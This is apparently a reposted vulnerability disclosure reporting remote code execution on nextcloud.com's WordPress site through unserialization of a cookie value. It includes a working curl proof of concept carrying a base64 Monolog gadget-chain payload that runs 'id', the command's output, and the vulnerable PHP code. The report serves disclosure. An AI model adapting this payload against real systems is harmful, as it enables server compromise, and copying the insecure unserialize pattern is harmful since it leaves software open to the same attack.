Nextcloud: RCE on Wordpress website
News category: Security vulnerabilities
Source: vulners.com
There is a trivial-to-exploit Remote Code Execution on nextcloud.com due to unserializing user input.

Proof of concept

The following command will execute the system('id') command on the host. As the gadget chain I've used Monolog, which is included in the PodLove WordPress plugin used on nextcloud.com:

```shell
curl -i -s -k -X $'GET' \
  -H $'Host: nextcloud.com' \
  -b $'nc_cookie_banner={\"essentials\":true,\"convenience\":false,\"statistics\":{\"matomo\":false},\"external_media\":{\"youtube\":false,\"vimeo\":false}}; wp-wpml_current_language=en; nc_form_fields=TzozNzoiTW9ub2xvZ1xIYW5kbGVyXEZpbmdlcnNDcm9zc2VkSGFuZGxlciI6NDp7czoxNjoiACoAcGFzc3RocnVMZXZlbCI7aTowO3M6MTA6IgAqAGhhbmRsZXIiO3I6MTtzOjk6IgAqAGJ1ZmZlciI7YToxOntpOjA7YToyOntpOjA7czoyOiJpZCI7czo1OiJsZXZlbCI7aToxMDA7fX1zOjEzOiIAKgBwcm9jZXNzb3JzIjthOjI6e2k6MDtzOjM6InBvcyI7aToxO3M6Njoic3lzdGVtIjt9fQ==' \
  $'https://nextcloud.com/newsletter/'
```

The last line of the response will contain the output of the id command:

```
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

Vulnerable lines of code

The unserialize call in the code paths below is performed on user input ($_COOKIE['nc_form_fields']):

https://github.com/nextcloud/nextcloud-theme/blob/e6db0a90391ec94f9eb6d86e16dc16e36c5f4dd4/inc/ninjaforms.php#L114

```php
add_filter( 'ninja_forms_render_default_value', 'nc_change_nf_default_value', 10, 3 );
function nc_change_nf_default_value( $default_value, $field_type,... ...
```